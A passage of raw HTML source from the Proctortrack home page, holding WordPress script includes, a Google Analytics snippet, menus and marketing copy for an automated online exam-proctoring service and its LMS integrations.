Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='https://www.proctortrack.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1'></script> <script type='text/javascript' src='https://www.proctortrack.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* ]]> */ </script> <script type='text/javascript' src='/wp-content/themes/uncode/library/js/min/ai-uncode.min.js' id='uncodeAI' data-home='/' data-path='/' data-breakpoints-images='258,516,720,1032,1440,2064,2880'></script> <script type='text/javascript'> /* <![CDATA[ */ var SiteParameters = {"site_url":"https:\/\/www.proctortrack.com\/","theme_directory":"https:\/\/www.proctortrack.com\/wp-content\/themes\/uncode","days":"days","hours":"hours","minutes":"minutes","seconds":"seconds","constant_scroll":"on","scroll_speed":"2","parallax_factor":"0.25"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.proctortrack.com/wp-content/themes/uncode/library/js/init.js?ver=171754000'></script> <meta name="generator" content="Powered by LayerSlider 5.6.10 - Multi-Purpose, Responsive, Parallax, Mobile-Friendly Slider Plugin for WordPress." /> <!-- LayerSlider updates and docs at: https://kreaturamedia.com/layerslider-responsive-wordpress-slider-plugin/ --> <link rel='https://api.w.org/' href='https://www.proctortrack.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.proctortrack.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.proctortrack.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel="canonical" href="https://www.proctortrack.com/" /> <link rel='shortlink' href='https://www.proctortrack.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.proctortrack.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.proctortrack.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.proctortrack.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.proctortrack.com%2F&#038;format=xml" /> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://www.proctortrack.com/wp-content/plugins/uncode-js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE 8]><link rel="stylesheet" type="text/css" href="https://www.proctortrack.com/wp-content/plugins/uncode-js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]--> <script type="text/javascript"> var cli_flush_cache=2; </script> <link rel="icon" href="https://www.proctortrack.com/wp-content/uploads/2017/02/cropped-fav-1-32x32.png" sizes="32x32" /> <link rel="icon" href="https://www.proctortrack.com/wp-content/uploads/2017/02/cropped-fav-1-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.proctortrack.com/wp-content/uploads/2017/02/cropped-fav-1-180x180.png" /> <meta name="msapplication-TileImage" content="https://www.proctortrack.com/wp-content/uploads/2017/02/cropped-fav-1-270x270.png" /> <!-- BEGIN ExactMetrics v5.3.8 Universal Analytics - https://exactmetrics.com/ --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-127653533-1', 'auto'); ga('send', 'pageview'); </script> <!-- END ExactMetrics Universal Analytics --> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1490736135542{border-top-width: 1px !important;}.vc_custom_1480968980028{border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head> <body class="home page-template-default page page-id-12 page-parent style-color-lxmt-bg group-blog smooth-scroller hmenu hmenu-position-right header-full-width main-center-align wpb-js-composer js-comp-ver-4.12.1 vc_responsive" data-border="0"> <div class="body-borders" data-border="0"><div class="top-border body-border-shadow"></div><div class="right-border body-border-shadow"></div><div class="bottom-border body-border-shadow"></div><div class="left-border body-border-shadow"></div><div class="top-border style-light-bg"></div><div class="right-border style-light-bg"></div><div class="bottom-border style-light-bg"></div><div class="left-border style-light-bg"></div></div> <div class="box-wrapper"> <div class="box-container"> <script type="text/javascript">UNCODE.initBox();</script> <div class="menu-wrapper menu-sticky"> <header id="masthead" class="navbar menu-primary menu-light submenu-light style-light-original menu-with-logo"> <div class="menu-container style-color-xsdn-bg menu-borders menu-shadows"> <div class="row-menu"> <div class="row-menu-inner"> <div id="logo-container-mobile" class="col-lg-0 logo-container middle"> <div id="main-logo" class="navbar-header style-light"> <a href="https://www.proctortrack.com" class="navbar-brand" data-minheight="20"><div class="logo-image logo-skinnable" data-maxheight="50" style="height: 50px;"><img src="https://www.proctortrack.com/wp-content/uploads/2017/02/proctortrack-logo-new-uai-258x55.png" alt="online proctoring Proctortrack logo" width="258" height="55" class="img-responsive adaptive-async" data-uniqueid="732-149487" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/proctortrack-logo-new.png" data-path="2017/02/proctortrack-logo-new.png" data-width="341" data-height="73" data-singlew="null" data-singleh="null" data-crop="" data-fixed="height" /></div></a> </div> <div class="mmb-container"><div class="mobile-menu-button mobile-menu-button-light lines-button x2"><span class="lines"></span></div></div> </div> <div class="col-lg-12 main-menu-container middle"> <div class="menu-horizontal"> <div class="menu-horizontal-inner"> <div class="nav navbar-nav navbar-main navbar-nav-last"><ul id="menu-menupt" class="menu-primary-inner menu-smart sm"><li id="menu-item-14" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-12 current_page_item menu-item-has-children menu-item-14 dropdown active menu-item-link"><a title="STUDENTS" href="https://www.proctortrack.com/" data-toggle="dropdown" class="dropdown-toggle" data-type="title">STUDENTS<i class="fa fa-angle-down fa-dropdown"></i></a> <ul role="menu" class="drop-menu"> <li id="menu-item-563" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-563"><a title="HOW IT WORKS" href="https://www.proctortrack.com/students/howitworks/">HOW IT WORKS<i class="fa fa-angle-right fa-dropdown"></i></a></li> <li id="menu-item-564" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-564"><a title="TECH REQUIREMENTS" href="https://www.proctortrack.com/students/tech-requirements/">TECH REQUIREMENTS<i class="fa fa-angle-right fa-dropdown"></i></a></li> <li id="menu-item-578" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-578"><a title="NEED HELP?" href="https://www.proctortrack.com/support/">NEED HELP?<i class="fa fa-angle-right fa-dropdown"></i></a></li> <li id="menu-item-640" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-640"><a title="PRIVACY PLEDGE" href="https://www.proctortrack.com/studentprivacypledge/">PRIVACY PLEDGE<i class="fa fa-angle-right fa-dropdown"></i></a></li> </ul> </li> <li id="menu-item-155" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-155 dropdown menu-item-link"><a title="INSTRUCTORS" href="https://www.proctortrack.com/instructors/" data-toggle="dropdown" class="dropdown-toggle" data-type="title">INSTRUCTORS<i class="fa fa-angle-down fa-dropdown"></i></a> <ul role="menu" class="drop-menu"> <li id="menu-item-565" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-565"><a title="CONTACT SALES" href="https://www.proctortrack.com/instructors/signup/">CONTACT SALES<i class="fa fa-angle-right fa-dropdown"></i></a></li> <li id="menu-item-566" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-566"><a title="HOW DOES IT WORK" href="https://www.proctortrack.com/instructors/howitworks/">HOW DOES IT WORK<i class="fa fa-angle-right fa-dropdown"></i></a></li> <li id="menu-item-579" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-579"><a title="SUPPORT" href="https://www.proctortrack.com/support/">SUPPORT<i class="fa fa-angle-right fa-dropdown"></i></a></li> </ul> </li> <li id="menu-item-130" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-130 menu-item-link"><a title="INSTITUTIONS" href="https://www.proctortrack.com/institutions/">INSTITUTIONS<i class="fa fa-angle-right fa-dropdown"></i></a></li> <li id="menu-item-988" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-988 menu-item-link"><a title="REQUEST A DEMO" href="https://www.proctortrack.com/demo/">REQUEST A DEMO<i class="fa fa-angle-right fa-dropdown"></i></a></li> </ul></div><div class="desktop-hidden"> </div></div> </div> </div> </div> </div> </div> </header> </div> <script type="text/javascript">UNCODE.fixMenuHeight();</script> <div class="main-wrapper"> <div class="main-container"> <div class="page-wrapper"> <div class="sections-container"><script type="text/javascript">UNCODE.initHeader();</script><article id="post-12" class="page-body style-light-bg post-12 page type-page status-publish hentry"> <div class="post-wrapper"> <div class="post-body"><div class="post-content"><div data-parent="true" class="style-color-xsdn-bg row-container with-parallax onepage-section" data-label="Welcome" data-name="welcome"><div class="row-background background-element"> <div class="background-wrapper"> <div class="background-inner adaptive-async" style="background-image: url(https://www.proctortrack.com/wp-content/uploads/2017/02/Header_Proctortrack-1024x682-uai-258x172.jpg);background-repeat: no-repeat;background-position: right top;background-size: cover;" data-uniqueid="797-187362" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/Header_Proctortrack-1024x682.jpg" data-path="2017/02/Header_Proctortrack-1024x682.jpg" data-width="1024" data-height="684" data-singlew="12" data-singleh="null" data-crop=""></div> <div class="block-bg-overlay style-color-prif-bg" style="opacity: 0.63;"></div> </div> </div><div class="row limit-width row-parent" data-height-ratio="80"><div class="row-inner"><div class="pos-middle pos-center align_left column_parent col-lg-12 single-internal-gutter"><div class="uncol style-dark" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="row-internal row-container"><div class="row col-double-gutter row-child"><div class="row-inner"><div class="pos-bottom pos-left align_left align_center_tablet align_center_mobile column_child col-lg-6 mobile-hidden no-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell vc_custom_1480968980028 no-block-padding"><div class="uncont"></div></div></div></div></div><div class="pos-middle pos-left align_left align_center_tablet align_center_mobile column_child col-lg-6 col-md-100 single-internal-gutter"><div class="uncol style-dark" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="heading-text el-text bottom-t-top animate_when_almost_visible" data-delay="200"><h1 class="font-762333 h1" ><span><span style="font-weight: 400;">Welcome to a new online remote proctoring experience</span></span></h1><hr class="separator-break" /><div class="text-lead text-top-reduced"><p>As the most student-friendly online remote proctoring solution, Proctortrack™ utilizes an automated, proctorless™ approach to offer convenience, comfort, ease of use, and security. Carefully designed with you in mind.</p> </div></div><div class="clear"></div><span class="btn-container animate_when_almost_visible bottom-t-top" data-delay="200"><a href="http://testing.verificient.com" class="custom-link btn btn-sm btn-accent btn-round btn-shadow btn-icon-left">Log in</a></span><div class="empty-space empty-single"><span class="empty-space-inner"></span></div> </div></div></div></div></div></div></div></div></div></div></div></div></div><script id="script-637879" type="text/javascript">UNCODE.initRow(document.getElementById("script-637879"));</script></div></div></div><div data-parent="true" class="style-accent-bg row-container with-parallax onepage-section" data-label="Features" data-name="features"><div class="row-background background-element"> <div class="background-wrapper"> <div class="background-inner" style="background-repeat: no-repeat;background-position: center center;background-size: cover;"></div> <div class="block-bg-overlay style-color-143431-bg" style="opacity: 0.9;"></div> </div> </div><div class="row quad-top-padding quad-bottom-padding single-h-padding limit-width row-parent"><div class="row-inner"><div class="pos-top pos-left align_center column_parent col-lg-12 double-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="row-internal row-container"><div class="row row-child"><div class="row-inner"><div class="pos-top pos-center align_left column_child col-lg-4 col-md-33 single-internal-gutter"><div class="uncol style-dark" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="animate_when_almost_visible bottom-t-top icon-box icon-box-left" data-delay="200"><div class="icon-box-icon fa-container"><span class="text-default-color btn-disable-hover"><i class="fa fa-desktop2 fa-2x fa-fw"></i></span></div><div class="icon-box-content"><div class="icon-box-heading icon-box-fa-2x"><h3 class="h5">Test at Your Convenience</h3></div><p class=""><span style="font-weight: 400;">Take your exam from the comforts of home, with no commuting or advanced scheduling required - available anytime, anywhere, on-demand.</span></p></div></div></div></div></div></div></div><div class="pos-top pos-center align_left column_child col-lg-4 col-md-33 single-internal-gutter"><div class="uncol style-dark" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="animate_when_almost_visible bottom-t-top icon-box icon-box-left" data-delay="400"><div class="icon-box-icon fa-container"><span class="text-default-color btn-disable-hover"><i class="fa fa-piechart fa-2x fa-fw"></i></span></div><div class="icon-box-content"><div class="icon-box-heading icon-box-fa-2x"><h3 class="h5">Low-Cost Solution </h3></div><p class=""><span style="font-weight: 400;">Automated remote proctoring offers consistent results at-scale, which translates to a more affordable world class solutions.</span></p></div></div></div></div></div></div></div><div class="pos-top pos-center align_left column_child col-lg-4 col-md-33 single-internal-gutter"><div class="uncol style-dark" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="animate_when_almost_visible bottom-t-top icon-box icon-box-left" data-delay="600"><div class="icon-box-icon fa-container"><span class="text-default-color btn-disable-hover"><i class="fa fa-profile-male fa-2x fa-fw"></i></span></div><div class="icon-box-content"><div class="icon-box-heading icon-box-fa-2x"><h3 class="h5">Easy to Use</h3></div><p class=""><span style="font-weight: 400;">Simply launch the app from inside your LMS to take a proctored exam. It is student-friendly, convenient - secure and easy to use, comfortable proctoring experience.</span></p></div></div></div></div></div></div></div></div></div></div><div class="row-internal row-container"><div class="row row-child"><div class="row-inner"><div class="pos-top pos-center align_left column_child col-lg-4 col-md-33 single-internal-gutter"><div class="uncol style-dark" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="animate_when_almost_visible bottom-t-top icon-box icon-box-left" data-delay="200"><div class="icon-box-icon fa-container"><span class="text-default-color btn-disable-hover"><i class="fa fa-phone2 fa-2x fa-fw"></i></span></div><div class="icon-box-content"><div class="icon-box-heading icon-box-fa-2x"><h3 class="h5">Excel With Integrity</h3></div><p class=""><span style="font-weight: 400;">Get the credit you deserve, and emerge from a level playing field with a more valuable degree. Having academic integrity is important because it provides value to your degree.</span></p></div></div></div></div></div></div></div><div class="pos-top pos-center align_left column_child col-lg-4 col-md-33 single-internal-gutter"><div class="uncol style-dark" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="animate_when_almost_visible bottom-t-top icon-box icon-box-left" data-delay="400"><div class="icon-box-icon fa-container"><span class="text-default-color btn-disable-hover"><i class="fa fa-gears2 fa-2x fa-fw"></i></span></div><div class="icon-box-content"><div class="icon-box-heading icon-box-fa-2x"><h3 class="h5">Automated Proctorless™ Approach</h3></div><p class=""><span style="font-weight: 400;">Remove the manual element for a less intrusive, more comfortable proctoring experience. Helps utilizes an automated, proctorless approach to online course exam.</span></p></div></div></div></div></div></div></div><div class="pos-top pos-center align_left column_child col-lg-4 col-md-33 single-internal-gutter"><div class="uncol style-dark" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="animate_when_almost_visible bottom-t-top icon-box icon-box-left" data-delay="600"><div class="icon-box-icon fa-container"><span class="text-default-color btn-disable-hover"><i class="fa fa-tools fa-2x fa-fw"></i></span></div><div class="icon-box-content"><div class="icon-box-heading icon-box-fa-2x"><h3 class="h5">Student Privacy Secure</h3></div><p class=""><span style="font-weight: 400;">All student data is handled in compliance with FERPA regulations, protected with military-grade encryption, and purged in accordance with our data retention schedule - proud signatory of the Student Privacy Pledge.</span></p></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div><script id="script-353430" type="text/javascript">UNCODE.initRow(document.getElementById("script-353430"));</script></div></div></div><div data-parent="true" class="style-color-lxmt-bg row-container onepage-section" data-label="Features " data-name="features"><div class="row triple-top-padding triple-bottom-padding single-h-padding limit-width row-parent"><div class="row-inner"><div class="pos-top pos-center align_center column_parent col-lg-12 double-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="row-internal row-container"><div class="row row-child"><div class="row-inner"><div class="pos-top pos-center align_center column_child col-lg-12 half-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont" style="max-width:600px;"><div class="heading-text el-text bottom-t-top animate_when_almost_visible" data-delay="100"><h1 class="font-762333 h1 text-capitalize" ><span>Awesome features of Proctortrack™</span></h1><hr class="separator-break separator-accent" /><div class="text-lead"><p>Enjoy a modern testing experience</p> </div></div><div class="clear"></div></div></div></div></div></div></div></div></div><div class="style-color-lxmt-bg row-internal row-container"><div class="row row-child"><div class="row-inner"><div class="pos-middle pos-center align_right align_left_tablet align_center_mobile column_child col-lg-4 col-md-100 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="heading-text el-text left-t-right animate_when_almost_visible" ><h2 class="h5" ><span><b>Seamless User Experience</b></span></h2><div class="text-top-reduced"><p>Proctortrack integrates into all LTI-compatible LMSs, and layers on top of third-party testing platforms for externally-hosted exams. </p> </div></div><div class="clear"></div><div class="heading-text el-text left-t-right animate_when_almost_visible" ><h2 class="h5" ><span><b>Browser Agnostic &amp; Cross-Platform Compatible</b></span></h2><div class="text-top-reduced"><p>Proctortrack meets users where they are comfortable, with support for all major browsers and operating systems.</p> </div></div><div class="clear"></div><div class="heading-text el-text left-t-right animate_when_almost_visible" ><h2 class="h5" ><span><strong>Online Remote Cognitive Proctoring</strong></span></h2><div class="text-top-reduced"><p>Proctortrack offers a superior online proctored exam experience for candidates and promotes excellence and integrity for education programs through various proctoring mechanisms.</p> </div></div><div class="clear"></div><div class="heading-text el-text left-t-right animate_when_almost_visible" ><h2 class="h5" ><span><strong>Online Auto Proctoring Services</strong></span></h2><div class="text-top-reduced"><p>Proctortrack is a smartest proctoring solution to detect cheating. It provides advanced automated online proctoring services for academic institutions and professional organizations.</p> </div></div><div class="clear"></div></div></div></div></div></div><div class="pos-middle pos-center align_center column_child col-lg-4 col-md-100 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="uncode-single-media text-center animate_when_almost_visible bottom-t-top" data-delay="200"><div class="single-wrapper" style="max-width: 100%;"><div class="tmb tmb-light tmb-media-first tmb-media-last tmb-content-overlay tmb-no-bg"> <div class="t-inside"><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="uncode-single-media-wrapper"> <img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/mackbookair-single-review-1024x618-uai-258x156.png" width="258" height="156" alt="remote worker continuous proctoring identity security for online proctored exam, online proctoring software" data-uniqueid="347-105049" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/mackbookair-single-review-1024x618.png" data-path="2017/02/mackbookair-single-review-1024x618.png" data-width="1024" data-height="618" data-singlew="4" data-singleh="" data-crop="" data-fixed=""></div> </div> </div></div> </div></div></div></div></div></div></div></div><div class="pos-middle pos-center align_left column_child col-lg-4 col-md-100 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="heading-text el-text right-t-left animate_when_almost_visible" ><h2 class="h5" ><span><strong>Cheat Proof  Proctoring Exam</strong></span></h2><div class="text-top-reduced"><p>Proctortrack is platforms that utilize biometrics and machine learning to help conduct online proctoring exams securely and ensures cheat proof live test.</p> </div></div><div class="clear"></div><div class="heading-text el-text right-t-left animate_when_almost_visible" ><h2 class="h5" ><span><b>Intuitive Design</b></span></h2><div class="text-top-reduced"><p>Proctortrack contains the entire experience within the LMS environment for students and instructors, with configurable settings to accommodate users and exams of all types.</p> </div></div><div class="clear"></div><div class="heading-text el-text right-t-left animate_when_almost_visible" ><h2 class="h5" ><span><b>Online Proctored Exam</b></span></h2><div class="text-top-reduced"><p>Proctortrack is AI based behavior analysis – actions &amp; behaviors automatically monitored and flagged when suspicious activities conducted by the student during the online proctored exam.</p> </div></div><div class="clear"></div><div class="heading-text el-text right-t-left animate_when_almost_visible" ><h2 class="h5" ><span><b>Award-Winning Customer Service</b></span></h2><div class="text-top-reduced"><p>Proctortrack customer support is available 24x7x365, via live-chat, phone, and email, where students and instructors can instantly connect with a trained support technician.</p> </div></div><div class="clear"></div></div></div></div></div></div></div></div></div></div></div></div></div></div><script id="script-195694" type="text/javascript">UNCODE.initRow(document.getElementById("script-195694"));</script></div></div></div><div data-parent="true" class="row-container onepage-section mobile-hidden" data-label="Integrations" data-name="integrations"><div class="row full-width row-parent" data-height-ratio="4"><div class="row-inner"><div class="pos-top pos-center align_left column_parent col-lg-12 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="owl-carousel-wrapper"> <div class="owl-carousel-container owl-carousel-loading single-gutter"> <div id="gallery-100616" class="owl-carousel owl-element owl-valign-middle owl-height-auto" data-fade="true" data-navmobile="false" data-navspeed="400" data-autoplay="true" data-timeout="3000" data-lg="9" data-md="9" data-sm="9"> <div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 61.24%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/moodle_logo-1-uai-258x158.png" width="258" height="158" alt="proctortrack and moodle remote worker continuous proctoring identity security remote worker continuous proctoring identity security" data-uniqueid="809-253633" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/moodle_logo-1.png" data-path="2017/02/moodle_logo-1.png" data-width="588" data-height="360" data-singlew="1.3333333333333" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 77.13%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/flat_world_knowledge-1-uai-258x199.png" width="258" height="199" alt="proctortrack identity verification remote worker continuous proctoring identity security remote worker continuous proctoring identity security" data-uniqueid="817-758548" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/flat_world_knowledge-1.png" data-path="2017/02/flat_world_knowledge-1.png" data-width="466" data-height="360" data-singlew="1.3333333333333" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 77.52%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/blackboard_logo-1-uai-258x200.png" width="258" height="200" alt="proctortrack identity verification" data-uniqueid="821-502232" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/blackboard_logo-1.png" data-path="2017/02/blackboard_logo-1.png" data-width="465" data-height="360" data-singlew="1.3333333333333" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 138.46%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img src="https://www.proctortrack.com/wp-content/uploads/2017/02/angel_learning_logo.gif" width="260" height="360" alt="proctortrack identity verification" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 119.77%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/edx_logo_square-1-uai-258x309.png" width="258" height="309" alt="remote worker continuous proctoring identity security remote worker continuous proctoring identity security" data-uniqueid="813-181204" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/edx_logo_square-1.png" data-path="2017/02/edx_logo_square-1.png" data-width="301" data-height="360" data-singlew="1.3333333333333" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 101.55%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/ecollege_logo-1-uai-258x262.png" width="258" height="262" alt="remote worker continuous proctoring identity security remote worker continuous proctoring identity security" data-uniqueid="825-885294" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/ecollege_logo-1.png" data-path="2017/02/ecollege_logo-1.png" data-width="354" data-height="360" data-singlew="1.3333333333333" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced 